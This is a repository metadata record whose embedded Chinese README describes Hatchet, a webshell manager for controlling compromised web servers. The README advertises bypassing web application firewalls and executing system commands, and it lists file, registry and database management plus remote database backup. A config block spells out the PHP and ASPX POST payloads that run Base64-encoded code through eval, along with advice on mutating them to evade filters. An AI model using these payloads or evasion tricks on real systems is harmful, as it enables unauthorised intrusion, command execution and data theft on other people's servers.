{"id":13778233,"url":"https://github.com/euphrat1ca/hatchet","last_synced_at":"2025-04-26T09:32:13.381Z","repository":{"id":154217647,"uuid":"124034571","full_name":"euphrat1ca/hatchet","owner":"euphrat1ca","description":"cknife（webshell manager）","archived":false,"fork":false,"pushed_at":"2018-03-06T07:26:11.000Z","size":1086,"stargazers_count":27,"open_issues_count":0,"forks_count":20,"subscribers_count":0,"default_branch":"master","last_synced_at":"2025-04-04T10:37:30.407Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"C++","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/euphrat1ca.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2018-03-06T06:54:55.000Z","updated_at":"2024-07-24T10:52:57.000Z","dependencies_parsed_at":"2023-05-31T07:00:33.183Z","dependency_job_id":null,"html_url":"https://github.com/euphrat1ca/hatchet","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/euphrat1ca%2Fhatchet","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/euphrat1ca%2Fhatchet/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/euphrat1ca%2Fhatchet/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/euphrat1ca%2Fhatchet/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/euphrat1ca","download_url":"https://codeload.github.com/euphrat1ca/hatchet/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":250967286,"owners_count":21515569,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-03T18:00:52.259Z","updated_at":"2025-04-26T09:32:11.905Z","avatar_url":"https://github.com/euphrat1ca.png","language":"C++","funding_links":[],"categories":["\u003ca id=\"faa91844951d2c29b7b571c6e8a3eb54\"\u003e\u003c/a\u003e新添加"],"sub_categories":[],"readme":"Hatchet VS2005完整源码\n\n免责申明：\n\t请使用者注意使用环境并遵守国家相关法律法规！\n\t由于使用不当造成的后果本厂家不承担任何责任！\n------------------------------------------------------------\n1. 说明：\n\t我是一个产刀的，用于什么用途，由您自行选择。\n\n2. 致谢：\n\t菜刀某前辈及各位网友的建议\n\n3. 弱点：\n\t存在细节方面没处理好\n\t数据库与菜刀有所区别不能共用\n\n4. 优点：\n\t持续更新\n\t快捷键操作\n\t注册表读取\n\tHTTP头自行控制\n\tPOST部分数据可自定义，突破安全狗等WAF(一句话需自行处理)\n\tPHP Warning 警告去除，避免某些WAF等记录\n\tPHP支持多种执行命令，安全模式也能执行\n\tPHP管理PostgreSQL、ODBC_MSSQL、PDO_MYSQL、PDO_MSSQL数据库\n\tHTTP代理，只完成PHP。支持HTTP[S] GET POST\n\t文件夹双击进入，树形框的上一层可以点击\n\t支持NTLM验证\n\tCOMBO历史记录\n\t支持选择数据库后直接执行SQL命令\n\t数据库右键获取20条记录\n\t支持JSP上传\n\t文件[夹]剪切(文件移动机制秒移)\n\t文件[夹]多选删除\n\t文件[夹]多选下载\n\t应该来说不会崩溃\n\t右键导出数据库查询结果保存TXT，默认每一个字段用一个【TAB】分开，如果需要用其他字符请在填写保存文件名的时候，后面加上\u0026\u0026，紧跟分隔符。如: table.txt\u0026\u0026@_@\n\t数据库执行SQL查询时，直接导出到本地文件，不显示到列表框。SQL命令后面加上--file:紧跟要导出到的文件名。如: Select * From Members Limit 0,20--file:1.txt\n\t支持PHP脚本的数据库管理，远程备份。如: Select * From Members Limit 0,20--save:data.sql--split:@_@\n\n5. 后门：\n\t缩小体积已加UPX壳\n\t绝无有意添加的后门，但三流的业余技能不排除被远程溢出的BUG\n\t文件: C:\\Projects\\Hatchet\\release\\Hatchet.exe\n\t大小: 269312 字节\n\t文件版本: 1.0.0.1\n\t修改时间: 2014年8月26日, 12:19:43\n\tMD5: 91FAA43F3F89083F2E9C78D05E13673C\n\tSHA1: A1B598CB4EB47554E6F191A7EB33111F462C77FD\n\tCRC32: C094BD42\n\n```cpp\n\t/*\n\t\t[Header]\n\t\tUser-Agent=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\n\t\tReferer=1\n\t\tX-Forwarded-For=1\n\t\t[/Header]\n\t\t[Headers]\n\t\tAccept-Language: en-us\n\t\tContent-Type: application/x-www-form-urlencoded\n\t\t[/Headers]\n\t\t[POST]\n\t\tASP_POST_DATA==Execute(\"Execute(\"\"On+Error+Resume+Next:Response.Clear:\n\n\t\tASPX_POST_DATA==Response.Write(\"-\u003e|\");var err:Exception;try{eval(System.Text.Encoding.GetEncoding(%nPageCode%).GetString(System.Convert.FromBase64String(\"%szBase64EvalCode%\")),\"unsafe\");}catch(err){Response.Write(\"ERROR:// \"%2Berr.message);}Response.Write(\"|\u003c-\");Response.End();\n\n\t\tPHP_POST_DATA==@eval(base64_decode($_POST[z0]));\u0026z0=\n\n\t\tPHP_POST_Z0_DATA=@ini_set(\"display_errors\",\"0\");@set_time_limit(0);@set_magic_quotes_runtime(0);\n\t\t[/POST]\n\n\t\t##################################################\n\t\t#以下是说明\n\t\t请严格保持该格式，大小写不一样\n\t\tReferer 为1 则程序自动添加\n\t\tX-Forwarded-For 为1 则程序自动随机生成添加\n\t\t如果要自己手动添加其固定值，请设为0，后在[Headers]里添加即可。\n\t\t[POST]里为POST的部分数据，可自行变异这段代码，过安全狗等，很灵活的哦～\n\t\t%nPageCode% 为程序需要处理的编码，请保留\n\t\t%szBase64EvalCode% 为程序需要处理的执行代码，请保留\n\t*/\n```\n------------------------------------------------------------\n2013.12.03\n*\t本地数据库单引号\n*\tCMD选择所有，任意键覆盖\n+\tFileSave CTRL+A\n\n2013.12.07\n*\tJSP 传递没有 UrlEnCode\n+\t增加文件夹下载\n*\t站点管理，光标URL全选\n*\tszMyBase64Encode.Replace(\"+\",\"%2B\");\n\n2013.12.09\n+\t增加 HTTP 错误显示\n*\t修正下载目录，win linux / \\\n*\t修正'\\0'格式化发生的截断\n\n2013.12.10\n+\tTAB标签OK\n*\tASPX脚本编码\n\n2013.12.11\n*\tTAB的X范围加大\n+\tPHP脚本过安全狗\n\n2013.12.12\n*\teval preg_replace均可以使用过狗版本\tchr(45).\n+\t稍微完善一下状态栏\n\n2013.12.13\n*\t下载、上传文件开启一个新线程\n\n2013.12.18\n+\tasp\t\\r\\nOn+Error\t过狗\n+\taspx\tvar err\\r\\n\t过狗\n*\tShell类型编辑时，内容一样不更新\n*\t文件管理重命名、更改时间，内容一样不更新\n+\t快捷键 F2 文件管理重命名\n\n2013.12.19\n+\t增加自写代码\n+\t增加HTTP头 INI里配置(在主界面右键里，如果文件不存在，第一次自动生成)\n\n2013.12.21\n*\t修正文件内容Linux(\\n)换行显示\n+\t文件内容 Ctrl+F 查找\n*\t修正多线程，随机IP都一样\n*\tPHP Warning 警告去除\n+\t自写代码快捷键 Ctrl+A，F5执行\n\n2013.12.23\n+\t增加右键数据库查询结果导出TXT，默认每一个字段用一个【TAB】分开，如果需要用其他字符请在填写保存文件名的时候，后面加上\u0026\u0026，紧跟分隔符。如: table.txt\u0026\u0026,\n+\t增加数据库执行SQL查询时，直接导出到本地文件，不显示到列表框。SQL命令后面加上--file:紧跟要导出到的文件名。如: Select * From Members Limit 0,20--file:1.txt\n*\t数据库查询结果显示，计算错误的小Bug\n*\t数据库错误显示的问题\n\n2013.12.24\n*\tUTF8 GBK互换的BUG\n\n2013.12.27\n+\t增加连接数据库代码实例\n+\t增加命令执行方式(system,passthru,shell_exec,exec,WScript.shell)\n\n2013.12.29\n+\t增加PHP管理PostgreSQL数据库\n*\tPHP MySQL少写z1=\n\n2014.01.04\n+\t增加PHP管理ODBC_MSSQL数据库\n\n2014.01.07\n*\t数据库导出HTML编码设置charset=GBK\n*\tJSP查询数据库错误不弹AfxMessageBox\n\n2014.01.08\n+\tShell列表排序\n*\tShell日期的月份日期添加前导零\n*\t修正上传文件大小限制\n\n2014.01.09\n*\t修正CMD，cls清空后上下箭头还原旧内容\n\n2014.01.10\n+\t显示下载进度大小\n*\t选择保存文件夹可删除|OFN_NOCHANGEDIR\n+\t文件下载完成，自动打开文件夹选定文件。\n\n2014.01.14 感谢luoye\n*\t文件管理路径处理问题。防止调皮的伙伴C:\\\\\\\\\\\\\\\\\\\\\\\\或C://////////或C:\n*\tJSP db2连接例子有误password=123456;后面有分号。\n\n2014.01.24\n+\t增加标题栏右键系统菜单\n+\t记忆选择标签，文件管理，文件内容管理，内容关闭，回到文件管理\n*\t路途再远，也要回家。小伙伴们春节快乐！！！\n\n2014.02.11\n*\t运行软件，如果存在INI，自动加载。之前需要右键才会加载。OnMainUpdateIni(bool bNoCreat=true);\n+\t过360网站卫士\n+\tPOST前一小段数据可在INI里自定义，经研究可突破安全狗等WAF。\n\t\"=Execute(\\\"Execute(\\\"\\\"On+Error+Resume+Next: ==\u003e Ini_szASP_POST_DATA + \"\n\t\"=%40eval%09%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B\u0026z0= ==\u003e Ini_szPHP_POST_DATA + \"\n\n2014.02.21\n+\t数据库和文件管理树形框就地编辑，只是方便复制内容，不会改变服务器。\n*\t修正获取列表框的小问题。GetNextItem \u003c 0 return;\n+\t增加文件复制,文件剪切(仅PHP)\n\n2014.02.22\n+\t增加文件剪切(ASP ASPX JSP)\n\n2014.03.05\n*\t修正PreTranslateMessage事件处理忘记及时返回\n*\t修正文件管理，后续增加的映射磁盘网络磁盘等，显示会有问题。\n\n2014.03.17\n*\t某种原因，更改软件名称: Hatchet\n+\t增加POST的z0前部分自定义，突破安全宝的Base64关键词。\n*\t修正CMD框，等宽字体，对齐的问题。\n\n2014.03.18\n*\t修正CMD返回路径的截取问题\n*\t修正代码执行，等宽字体，对齐的问题。\n*\t修正获取文件内容，等宽字体，对齐的问题。\n+\t增加部分多线程，不卡界面。\n+\t增加代码执行导出导入。\n\n2014.04.01\n*\t界面大改动(非常感谢p1n9y_fly)\n+\t增加大部分多线程\n+\t增加部分快捷键\n\n2014.04.02\n*\t再次修正随机IP都一样\n-\t取消自动添加Cookie，导致INI里填的Cookie不能被添加上 INTERNET_FLAG_NO_COOKIES\n+\t增加快捷键 Ctrl+V\n+\t增加系统托盘\n*\t文件内容保存线程变量未初始化(感谢Xi总)\n*\t修正重命名、新建目录，如果文件[夹]存在，覆盖。(感谢Xi总)\n\n2014.04.04\n+\t增加上传文件后自动刷新列表\n*\t修正PHP文件[夹]可读可写标注。换成is_readable is_writable(感谢敌敌喂)\n*\t修正树形框，判断给定树项是否包含子项,2014.04.04 BUG，有子项，不一定已经存在(感谢敌敌喂)\n*\t修正文件管理C:\\/\\/\\/\\/这种路径\n*\t修正CMD Ctrl+V\n+\t增加Shell列表快捷键 Insert(添加) Delete(删除) Enter(编辑)\n+\t增加文件管理列表快捷键，回车进入文件夹或者文件内容编辑。\n\n2014.04.07\n*\t增强多文件处理\n*\t修正文件管理树形框小问题\n*\t更换文件管理EDIT-\u003eCOMBO\n+\t增加注册表管理\n\n2014.04.14\n+\t增加注册表本地缓存\n+\t稍微完善一下状态栏\n*\t修正asp数据库截取的BUG(感谢Ciph2r)\n*\t修正编辑的对话框显示位置问题\n+\t增加COMBO记录\n\n2014.05.07\n+\t增加显示版本\n*\t修正CMD\tcls保留系统信息\n+\t增加CMD\tPlease wait...\n+\t增加数据库右键查询20条\n+\t增加数据库ESC取消编辑\n*\t修正文件图标szIcoTemp变量忘记初始化\n+\t文件管理，回车或双击的文件如果是以下弹出下载\n\t\t.jpg.gif.png.bmp.jpeg.ico\n\t\t.zip.rar.tgz.7z.tar.gz.iso.cab.bz2.jar.dmg\n\t\t.exe.msi.dll.sys.avi.mpeg.mpg.vob.rmvb.wmv.mp3.mp4.3gp.ogg.voc\n\t\t.swf.pdf.flv.fla.psd.doc.docx.xls.xlsx.ppt.pptx.mdb.rtf\n\n2014.05.09\n+\t主页增加复制URL地址(Ctrl+C)\n*\t文件夹双击进入,树形框跟进(感谢Lee Swagger)\n*\t文件夹双击进入,树形框选择项并没有改变。SelectItem执行失败，换OnNMClickTree判断\n+\t增加ASPX POST数据INI自定义\n*\tMYSQL如有不正常的表名，中文、空格等，请用`包含表名(感谢Hancock)\n\n2014.05.21\n+\t增加全部EDIT，CTRL+A\n*\t修正MAIN IDC_EDIT_FIND，大小改变，被覆盖隐藏\n+\t增加Wget线程\n*\t修正数据库显示结果，编码问题导致的死循环\n*\t修正asp特殊环境缓存的问题。Response.Clear\n*\t修正asp数据库SI变量初始化\n+\t优化数据库返回的列表宽度\n\n2014.06.06\n+\t增加浏览器功能，以便支持NTLM验证(感谢R)\n*\t修正CMD如果所在光标位置可更改粘贴(感谢R)\n+\t增加CMD，ESC按键，清除当前输入的命令\n+\t增加浏览器状态和加载完成后的地址显示\n\n2014.07.02\n*\t修正如果标签已关闭，线程还在运行。导致的程序崩溃。if (pDlg-\u003em_hWnd == NULL)\n+\t增加PDO管理mysql和mssql数据库\n\n\n2014.07.07\n*\t修正PHP执行cmd变量未初始化$ret=1（函数禁用导致的出错）\n*\t修正CMD显示的小问题\n*\t切换标签，当前Dialog获得焦点\n+\t支持PHP脚本的数据库管理，远程备份\n\n2014.08.26\n*\t文件上传分块缩小，51200\n+\t添加一些状态\n*\tData select show\n*\tCMD命令排序\n+\tData Ctrl+C和F2快捷键\n*\t修正ComboBox下拉高度\n+\t添加Shell判断是否存在\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Feuphrat1ca%2Fhatchet","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Feuphrat1ca%2Fhatchet","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Feuphrat1ca%2Fhatchet/lists"}